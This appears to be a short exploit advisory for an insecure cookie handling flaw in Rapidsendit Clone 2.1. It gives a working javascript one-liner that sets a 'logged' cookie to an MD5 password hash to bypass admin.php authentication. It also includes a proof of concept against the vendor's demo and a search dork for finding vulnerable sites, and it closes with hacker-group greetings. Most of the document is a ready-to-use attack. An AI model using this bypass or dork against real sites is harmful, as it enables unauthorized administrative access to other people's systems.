======================================================================================


  [o] Rapidsendit Clone 2.1 Insecure Cookie Handling Vulnerability

       Software : Rapidsendit Clone version 2.1
       Vendor   : http://www.rapidsendit.com/
       Demo     : http://www.rapidsendit.com/script/demo.html
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


======================================================================================


  [o] Vulnerable file

       admin.php



  [o] Exploit

       javascript:document.cookie="logged=[md5_password_hash]; path=/";



  [o] Proof of concept

       http://www.rapidsendit.com/script/demo/admin.php

       replace url above with this javascript

       javascript:document.cookie="logged=696d29e0940a4957748fe3fc9efd22a3; path=/";

       696d29e0940a4957748fe3fc9efd22a3 = password



  [o] Dork

       "Powered By Rapidsendit Clone"


======================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org ]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
       H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

        
======================================================================================